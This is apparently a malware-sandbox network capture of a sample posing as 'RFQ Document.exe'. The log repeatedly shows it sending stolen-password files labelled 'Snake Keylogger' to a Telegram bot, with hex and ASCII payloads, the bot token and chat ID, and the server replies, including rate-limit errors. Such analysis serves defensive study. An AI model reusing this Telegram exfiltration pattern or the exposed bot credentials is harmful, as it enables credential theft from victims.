                                            Data Ascii: --------------------------8d98255f65a7c41Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:48 UTC478INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:48 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:48 UTC479INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12890,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            301192.168.2.450138149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:48 UTC479OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f6725283
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:48 UTC480OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 37 32 35 32 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f6725283Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:49 UTC480INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:49 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:49 UTC480INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12891,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            302192.168.2.450139149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:49 UTC481OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f68a2bcb
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:49 UTC481OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 38 61 32 62 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f68a2bcbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:49 UTC482INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:49 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:49 UTC482INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12892,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            303192.168.2.450140149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:49 UTC482OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f6a6c7a7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:49 UTC483OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 61 36 63 37 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f6a6c7a7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:49 UTC483INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:49 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:49 UTC484INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12893,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            304192.168.2.450141149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:49 UTC484OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f6be9e54
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:49 UTC484OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 62 65 39 65 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f6be9e54Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:49 UTC485INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:49 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:49 UTC485INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12894,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            305192.168.2.450142149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:49 UTC486OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f6d67670
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:49 UTC486OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 64 36 37 36 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f6d67670Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:49 UTC486INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:49 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:49 UTC487INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12895,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            306192.168.2.450143149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:49 UTC487OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f6f3139c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:49 UTC488OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 66 33 31 33 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f6f3139cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:49 UTC488INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:49 GMT
                                            Content-Type: application/json
                                            Content-Length: 111
                                            Connection: close
                                            Retry-After: 10
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:49 UTC488INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            307192.168.2.450144149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:49 UTC488OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f70ae976
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:49 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 30 61 65 39 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f70ae976Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:50 UTC489INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:50 GMT
                                            Content-Type: application/json
                                            Content-Length: 111
                                            Connection: close
                                            Retry-After: 10
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:50 UTC490INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            308192.168.2.450145149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:50 UTC490OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f7193963
                                            Host: api.telegram.org
                                            Content-Length: 407
